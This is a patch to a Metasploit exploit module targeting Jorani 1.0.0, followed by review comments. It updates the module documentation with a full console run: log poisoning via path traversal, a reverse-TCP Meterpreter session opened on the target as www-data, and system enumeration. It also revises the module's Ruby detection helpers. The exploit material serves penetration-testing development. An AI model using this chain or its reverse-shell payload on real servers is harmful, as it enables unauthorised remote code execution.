From 4ddd789f51ec86c8b1f101b76c2f32701d47b1d2 Mon Sep 17 00:00:00 2001 From: jheysel-r7 Date: Fri, 18 Aug 2023 15:33:59 -0400 Subject: [PATCH] Apply suggestions from code review --- .../exploit/multi/php/jorani_path_trav.md | 42 ++++++++++++------- .../exploits/multi/php/jorani_path_trav.rb | 10 +++-- 2 files changed, 32 insertions(+), 20 deletions(-) diff --git a/documentation/modules/exploit/multi/php/jorani_path_trav.md b/documentation/modules/exploit/multi/php/jorani_path_trav.md index a1938d0f36..9ce0265c32 100644 --- a/documentation/modules/exploit/multi/php/jorani_path_trav.md +++ b/documentation/modules/exploit/multi/php/jorani_path_trav.md @@ -20,6 +20,9 @@ So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbi This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75. +### Installation Steps +For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html) + ## Verification Steps 1. Start `msfconsole` 2. `use exploit/multi/php/jorani_path_trav` 
@@ -38,17 +41,17 @@ The path to the jorani website. By default it is empty. ## Scenarios ``` -msf6 exploit(multi/php/jorani_path_trav) > show options +msf6 exploit(multi/php/jorani_path_trav) > options Module options (exploit/multi/php/jorani_path_trav): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 172.31.3.3 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit + RHOSTS 172.16.199.158 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) - SSL true no Negotiate SSL/TLS for outgoing connections - TARGETURI / yes The base path of Jorani + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI jorani yes The base path of Jorani VHOST no HTTP server virtual host @@ -56,8 +59,8 @@ Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- - LHOST 172.31.3.1 yes The listen address (an interface may be specified) - LPORT 9898 yes The listen port + LHOST 172.16.199.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port Exploit target: 
@@ -69,24 +72,31 @@ Exploit target: View the full module info with the info, or info -d command. -``` -``` msf6 exploit(multi/php/jorani_path_trav) > run -[-] Handler failed to bind to 172.31.3.1:9898:- - -[*] Started reverse TCP handler on 0.0.0.0:9898 +[*] Started reverse TCP handler on 172.16.199.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking Jorani version +[+] Jorani seems to be running on the target! +[+] Found version: 1.0.0 +[+] The target appears to be vulnerable. [*] Trying to exploit LFI [*] Recovering CSRF token -[+] CSRF found: 3ff4c712b884e3f577d9c3f65adac16f -[*] Poisonning log with payload.. +[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546 +[*] Poisoning log with payload.. [*] Sending 1st payload -[*] Including poisonned log file log-2023-06-27.php +[*] Including poisoned log file log-2023-08-18.php. [+] Triggering payload -[*] Sending stage (39927 bytes) to 10.0.2.2 -[*] Meterpreter session 1 opened (10.0.2.15:9898 -> 10.0.2.2:46898) at 2023-06-27 19:21:28 +0200 +[*] Sending stage (39927 bytes) to 172.16.199.158 +[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400 -meterpreter > getuid +meterpreter > getuid Server username: www-data +meterpreter > sysinfo +Computer : ubuntu +OS : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64 +Meterpreter : php/linux +meterpreter > exit ``` diff --git a/modules/exploits/multi/php/jorani_path_trav.rb b/modules/exploits/multi/php/jorani_path_trav.rb index 678e821b65..2afb7d4971 100644 --- a/modules/exploits/multi/php/jorani_path_trav.rb +++ b/modules/exploits/multi/php/jorani_path_trav.rb 
@@ -55,7 +55,8 @@ class MetasploitModule < Msf::Exploit::Remote end def get_version(res) - matches = res.body.scan(/ v([0-9.]+) ©/i) + footer_text = res.get_html_document.xpath('//div[contains(@id, "footer")]').text + matches = footer_text.scan(/v([0-9.]+)/i) if matches.nil? || matches[0].nil? print_error('Cannot recovered Jorani version...') return nil @@ -64,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote end def service_running(res) - matches = res.body.scan(/Leave Management System/) + matches = res.get_html_document.xpath('//head/meta[@description]/@description').text.downcase.scan(/leave management system/) if matches.nil? print_error("Jorani doesn't appear to be running on the target") return false @@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote end def recover_csrf(res) - matches = res.body.scan(/
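Review bot: the tested-on line in the first documentation hunk still reads "kernel version 5.15.0-75", but the `sysinfo` output added at the end of the Scenarios hunk shows `Linux ubuntu 5.15.0-79-generic`; update the tested-on line to match the run that produced the new transcript (or state both). While touching that transcript, the two module strings it records, `Poisoning log with payload..` and `Including poisoned log file log-2023-08-18.php.`, carry a double period and a stray trailing period that come from the module's own `print_status` calls, so they need fixing in the `.rb` file rather than in the markdown.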
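Review bot: in the `get_version` hunk the new pattern `/v([0-9.]+)/i` is much looser than the ` v([0-9.]+) ©` it replaces: with the case-insensitive flag and a character class that accepts a leading dot, any "v" in the footer text followed by a dot or digit will match (for example the "v." of an abbreviation), and the first such hit is returned as the version. Require a digit right after the "v" and drop the flag unless the footer really mixes case, e.g. `matches = footer_text.scan(/\bv(\d+(?:\.\d+)+)/)`. The `matches.nil?` half of the check is dead since `String#scan` never returns nil, though `matches[0].nil?` still covers the no-match case; the unchanged context line `print_error('Cannot recovered Jorani version...')` should read `Cannot recover`.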
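Review bot: the `service_running` hunk keeps `if matches.nil?` after switching to `.text.downcase.scan(/leave management system/)`, but `scan` returns an empty array rather than nil when nothing matches, so the "doesn't appear to be running" branch can never fire and the method reports Jorani as present on any host. Use `if matches.empty?` (or `unless text.include?('leave management system')`). Also worth confirming against a live Jorani page that the XPath `//head/meta[@description]/@description` targets the right attribute: the usual form is `<meta name="description" content="...">`, which this expression would not select, so the check would always fail once the `nil?` bug is fixed.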